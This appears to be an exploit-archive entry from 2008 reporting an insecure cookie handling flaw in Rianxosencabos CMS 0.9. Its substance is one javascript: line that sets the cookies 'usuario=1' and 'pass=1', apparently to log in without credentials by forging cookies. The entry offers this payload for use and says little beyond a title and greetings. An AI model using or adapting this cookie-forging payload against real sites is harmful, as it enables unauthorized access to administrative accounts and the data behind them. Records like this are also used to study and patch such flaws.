id: 3716
date: 09/20/2008
title: Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

=============================================================
Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability 
=============================================================


###############################################################################################
[+]   Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";



#  0day.today [2023-03-26]  #